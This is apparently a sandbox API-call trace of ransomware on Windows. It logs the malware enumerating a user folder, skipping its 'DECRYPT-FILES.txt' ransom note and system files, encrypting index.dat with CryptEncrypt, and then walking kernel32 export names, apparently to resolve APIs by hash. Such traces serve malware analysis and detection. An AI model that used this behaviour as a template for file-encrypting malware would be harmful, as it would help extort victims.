lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xabd0abc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabd0abc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0079.893] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.893] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xabd0abc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabd0abc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0079.893] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.893] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.893] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabd0abc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabd0abc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabd0abc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0079.893] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0079.893] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x94fde710, ftCreationTime.dwHighDateTime=0x1d2fab5, ftLastAccessTime.dwLowDateTime=0x94fde710, ftLastAccessTime.dwHighDateTime=0x1d2fab5, ftLastWriteTime.dwLowDateTime=0x2bc126f0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0079.893] lstrcmpiW (lpString1="index.dat", lpString2="DECRYPT-FILES.txt") returned 1 [0079.893] lstrcmpiW (lpString1="index.dat", lpString2="autorun.inf") returned 1 [0079.893] lstrcmpiW (lpString1="index.dat", lpString2="boot.ini") returned 1 [0079.893] lstrcmpiW (lpString1="index.dat", lpString2="desktop.ini") returned 1 [0079.893] lstrcmpiW (lpString1="index.dat", lpString2="ntuser.dat") returned -1 [0079.893] lstrcmpiW (lpString1="index.dat", lpString2="iconcache.db") returned 1 [0079.893] lstrcmpiW (lpString1="index.dat", lpString2="bootsect.bak") returned 1 [0079.893] lstrcmpiW (lpString1="index.dat", lpString2="ntuser.dat.log") returned -1 [0079.894] lstrcmpiW (lpString1="index.dat", lpString2="thumbs.db") returned -1 [0079.894] lstrcmpiW (lpString1="index.dat", lpString2="Bootfont.bin") returned 1 [0079.894] lstrlenW (lpString="index.dat") returned 9 [0079.894] lstrcmpiW (lpString1="dat", lpString2="lnk") returned -1 [0079.894] lstrcmpiW (lpString1="dat", lpString2="exe") returned -1 [0079.894] lstrcmpiW (lpString1="dat", lpString2="sys") returned -1 [0079.894] lstrcmpiW (lpString1="dat", lpString2="dll") returned -1 [0079.894] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\") returned 73 [0079.894] lstrlenW (lpString="index.dat") returned 9 [0079.894] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\" [0079.894] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpString2="index.dat" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\index.dat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\index.dat" [0079.894] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.894] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\privacie\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x458 [0079.898] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=32768) returned 1 [0079.898] CreateFileMappingW (hFile=0x458, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x45c [0079.898] MapViewOfFile (hFileMappingObject=0x45c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0079.900] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.900] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.901] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.902] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0079.902] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0079.903] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.903] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0079.903] CloseHandle (hObject=0x45c) returned 1 [0079.904] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.904] WriteFile (in: hFile=0x458, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0079.936] CloseHandle (hObject=0x0) returned 0 [0079.936] CloseHandle (hObject=0x458) returned 1 [0079.940] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.940] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.941] GetTickCount () returned 0x114c794 [0079.941] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.941] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.941] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.941] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.941] lstrlenA (lpString="kernel32.dll") returned 12 [0079.942] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.942] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.942] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.942] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0079.942] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.942] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.942] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.942] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.942] lstrlenA (lpString="ADDATOMA") returned 8 [0079.942] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.942] lstrlenA (lpString="ADDATOMW") returned 8 [0079.942] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.942] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.942] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.942] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.942] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0079.942] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.942] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.942] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.942] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.942] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.942] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.942] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.942] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.942] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.942] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0079.942] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.942] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.943] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.943] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.943] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.943] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.943] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.943] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.943] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.943] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.943] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.943] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.943] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.943] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.943] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.943] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.943] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.943] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.943] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.943] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.943] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.943] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.943] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.943] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.943] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.943] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.943] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.943] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.943] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.943] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0079.943] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.943] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.943] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.943] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.943] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.943] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.943] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.943] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.943] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.944] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.944] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.944] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.944] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.944] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.944] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.944] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.944] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.944] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.944] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.944] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.944] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.944] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.944] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.944] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.944] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.944] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.944] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.944] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.944] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.944] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.944] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.944] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.944] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.944] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.944] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0079.944] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.944] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.944] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.944] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.944] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.944] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.944] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.944] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.944] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.944] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.945] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.945] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.945] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.945] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.945] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.945] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.945] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.945] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.945] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.945] lstrlenA (lpString="BEEP") returned 4 [0079.945] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.945] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.945] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.945] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.945] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.945] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.945] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.945] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.945] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.945] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.945] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.945] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.945] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.945] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.945] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.945] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.945] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.945] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.945] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.945] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0079.945] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.945] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.945] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.945] lstrlenA (lpString="CANCELIO") returned 8 [0079.945] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0079.945] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.946] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.946] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.946] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.946] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.946] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.946] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.946] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.946] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.946] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.946] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.946] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.946] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.946] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.946] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.946] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.946] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.946] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.946] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.946] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.946] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.946] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.946] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.946] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.946] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.946] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.946] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.946] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.946] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.946] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.946] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.946] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.947] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.947] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseProfileUserMapping" | out: 